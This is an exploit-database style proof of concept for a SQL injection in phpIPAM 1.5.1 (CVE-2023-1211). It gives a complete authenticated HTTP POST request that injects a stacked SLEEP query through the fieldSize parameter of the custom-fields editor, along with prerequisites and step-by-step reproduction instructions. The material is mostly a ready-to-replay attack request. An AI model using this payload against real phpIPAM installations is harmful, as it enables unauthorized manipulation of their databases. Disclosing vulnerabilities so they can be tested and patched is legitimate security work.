phpIPAM 1.5.1 - SQL Injection

# Exploit Title: phpIPAM 1.5.1 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage:  https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1 
# Tested on: Windows
# CVE : CVE-2023-1211


Proof Of Concept
POST /app/admin/custom-fields/edit-result.php HTTP/1.1
Host: phpipam
Cookie: PHPSESSID=<valid_session_id>; csrf_cookie=<valid_csrf_token>
Content-Type: application/x-www-form-urlencoded

csrf_cookie=<valid_csrf_token>&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+--+&table=devices&Comment=sql_poc&NULL=YES

**Prerequisites:**
1. Valid authenticated session (PHPSESSID cookie)
2. Valid CSRF token (obtain from `/admin/custom-fields/` page first)
3. Target table must exist (default 'devices' table used)
4. Field type must be enum/set to reach vulnerable code path

**Manual Test Steps:**
1. Login to phpIPAM
2. Visit `/admin/custom-fields/` to get CSRF token
3. Send POST request with above payload

**Note:** Replace `<valid_session_id>` and `<valid_csrf_token>` with actual values from authenticated session. The `fieldSize` parameter injects SQL through enum/set type definition context.



Steps to Reproduce
Login as an admin user.
Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie and csrf token.
Observe the result